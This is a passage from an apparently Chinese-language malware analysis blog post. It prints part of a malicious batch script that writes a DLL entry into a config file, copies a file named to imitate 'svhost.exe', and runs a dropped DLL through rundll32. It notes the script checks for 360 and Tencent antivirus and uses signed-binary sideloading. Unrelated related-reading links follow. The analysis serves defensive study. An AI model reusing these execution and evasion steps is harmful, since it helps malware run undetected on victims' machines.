    :echo InstParam=C:HTEMP0!gjOut!.dll,TrapEntry>>"gamepatchconfig.ini"
    :copy /y "svhost.exe" "yx.exe"
    exit
    :qt 
    rundll32.exe c:HTEMP0!gjOut!.dll,TrapEntry
    exit

    从代码中不难看出,脚本对360、腾讯管家等杀软做了检测,并且使用了白加黑方式进行样本的释放和运行,由于该脚本比较复杂,下篇做详细分析

    >>>>>>  黑客入门必备技能  带你入坑和逗比表哥们一起聊聊黑客的事儿,他们说高精尖的技术比农药都好玩~

  • 相关阅读:
    Win10 主题 美化 动漫
    Win10 主题 美化 动漫
    span 居中
    This version of MySQL doesn't yet support 'LIMIT & IN/ALL/ANY/SOME subquery
    10 Future Web Trends 十大未来互联网趋势
    10 Future Web Trends 十大未来互联网趋势
    使用pycharm进行简单的数据库管理
    使用pycharm进行简单的数据库管理
    Python开发利器PyCharm 2.7附注册码
    Python开发利器PyCharm 2.7附注册码
  • 原文地址:https://www.cnblogs.com/ichunqiu/p/8378639.html
Copyright © 2011-2022 走看看